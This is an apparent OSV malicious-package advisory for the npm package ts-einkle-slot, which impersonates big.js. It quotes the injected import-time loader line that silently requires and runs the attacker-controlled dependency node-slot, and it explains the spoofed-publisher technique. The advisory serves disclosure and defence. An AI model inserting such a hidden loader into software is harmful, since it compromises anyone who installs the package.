ts-einkle-slot @0.0.8

Vulnerability report · Last retrieved from osv.dev June 26, 2026 at 6:49 PM UTC

Malicious

OSV ID

MAL-2026-6525

Ecosystem

npm

Summary

The package is published as ts-einkle-slot, but its tarball contents (source, README, LICENCE, and the package.json author, repository and description fields) are copied verbatim from Michael Mclaughlin's legitimate big.js package, presenting a spoofed publisher identity. The CommonJS and ESM entrypoints (big.js and big.mjs, referenced from the main, module and exports fields) contain an injected top-level block: try { const doc = require('node-slot'); doc.from_str().then(e => {}).catch(e => {}) } catch (error) {}. This causes the transitive dependency node-slot (pulled in via the declared ts-einkle dependency) to be loaded and its from_str() invoked the moment any consumer requires or imports this package, with all errors silently swallowed so that the host package keeps functioning as a drop-in big.js replacement. The package's advertised purpose is decimal arithmetic; there is no legitimate reason to load an unrelated node-slot runtime module on import. Installer harm is delivered by the attacker-controlled transitive dependency node-slot, which is pulled into the install tree solely by virtue of installing this package.

Source: amazon-inspector (f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b)